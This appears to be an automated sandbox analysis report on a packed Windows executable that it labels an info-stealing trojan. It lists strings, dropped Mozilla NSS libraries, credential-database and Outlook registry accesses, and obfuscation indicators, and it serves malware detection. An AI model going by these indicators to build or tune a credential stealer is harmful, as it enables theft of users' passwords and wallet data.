Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: AKFHCAKJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: AKFHCAKJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1894074497.0000000029431000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1894074497.0000000029431000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C5EED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C62B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C62B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C62B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5CF280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B 0_2_00D3C89B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C25894 0_2_00C25894
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3288A 0_2_00D3288A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D391FA 0_2_00D391FA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D2F157 0_2_00D2F157
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C8895F 0_2_00C8895F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3E2E5 0_2_00D3E2E5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C82BB6 0_2_00C82BB6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3437B 0_2_00D3437B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C89363 0_2_00C89363
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E42B0A 0_2_00E42B0A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D424FB 0_2_00D424FB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C84C98 0_2_00C84C98
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BE64CE 0_2_00BE64CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D35D60 0_2_00D35D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D30D69 0_2_00D30D69
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CCF7B3 0_2_00CCF7B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C35A0 0_2_6C5C35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D5440 0_2_6C5D5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63545C 0_2_6C63545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63542B 0_2_6C63542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AC00 0_2_6C63AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C605C10 0_2_6C605C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C612C10 0_2_6C612C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ED4D0 0_2_6C5ED4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606CF0 0_2_6C606CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D64C0 0_2_6C5D64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CD4E0 0_2_6C5CD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6234A0 0_2_6C6234A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62C4A0 0_2_6C62C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D6C80 0_2_6C5D6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F0512 0_2_6C5F0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EED10 0_2_6C5EED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DFD00 0_2_6C5DFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6285F0 0_2_6C6285F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C600DD0 0_2_6C600DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636E63 0_2_6C636E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9E50 0_2_6C5E9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E4640 0_2_6C5E4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CC670 0_2_6C5CC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C612E4E 0_2_6C612E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C603E50 0_2_6C603E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C629E30 0_2_6C629E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C615600 0_2_6C615600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C607E10 0_2_6C607E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6376E3 0_2_6C6376E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CBEF0 0_2_6C5CBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DFEF0 0_2_6C5DFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C624EA0 0_2_6C624EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5E90 0_2_6C5E5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62E680 0_2_6C62E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D9F00 0_2_6C5D9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C607710 0_2_6C607710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F6FF0 0_2_6C5F6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CDFE0 0_2_6C5CDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6177A0 0_2_6C6177A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E8850 0_2_6C5E8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ED850 0_2_6C5ED850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60F070 0_2_6C60F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B820 0_2_6C60B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C614820 0_2_6C614820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D7810 0_2_6C5D7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6058E0 0_2_6C6058E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6350C7 0_2_6C6350C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EC0E0 0_2_6C5EC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F60A0 0_2_6C5F60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61B970 0_2_6C61B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B170 0_2_6C63B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EA940 0_2_6C5EA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DD960 0_2_6C5DD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FD9B0 0_2_6C5FD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C605190 0_2_6C605190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C622990 0_2_6C622990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CC9A0 0_2_6C5CC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C609A60 0_2_6C609A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60E2F0 0_2_6C60E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C608AC0 0_2_6C608AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E1AF0 0_2_6C5E1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C632AB0 0_2_6C632AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DCAB0 0_2_6C5DCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63BA90 0_2_6C63BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C22A0 0_2_6C5C22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F4AA0 0_2_6C5F4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C5340 0_2_6C5C5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DC370 0_2_6C5DC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60D320 0_2_6C60D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6353C8 0_2_6C6353C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CF380 0_2_6C5CF380
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6094D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5FCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 009745C0 appears 316 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1959123282.000000006C845000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: buyyxrmv ZLIB complexity 0.9949027185501066
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C627030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C627030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00988680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00988680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00983720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00983720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\QAG3HTB3.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1812462131.000000001D154000.00000004.00000020.00020000.00000000.sdmp, HJJJECFIECBGDGCAAAEH.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958376304.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1837056 > 1048576
Source: file.exe Static PE information: Raw size of buyyxrmv is bigger than: 0x100000 < 0x19a600
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1958990789.000000006C7FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.970000.0.unpack :EW;.rsrc :W;.idata :W; :EW;buyyxrmv:EW;hmyklufj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;buyyxrmv:EW;hmyklufj:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00989860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00989860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1cf351 should be: 0x1c2e04
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: buyyxrmv
Source: file.exe Static PE information: section name: hmyklufj
Source: file.exe Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0098E08B push cs; retf 0_2_0098E0A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D6C0C0 push edi; mov dword ptr [esp], ecx 0_2_00D6C853
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE68FB push ebp; mov dword ptr [esp], ecx 0_2_00DE693F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE68FB push edi; mov dword ptr [esp], ecx 0_2_00DE6970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push edx; mov dword ptr [esp], ebp 0_2_00D3C8A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 39BD330Dh; mov dword ptr [esp], edi 0_2_00D3C8D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 0143501Bh; mov dword ptr [esp], esi 0_2_00D3C90F
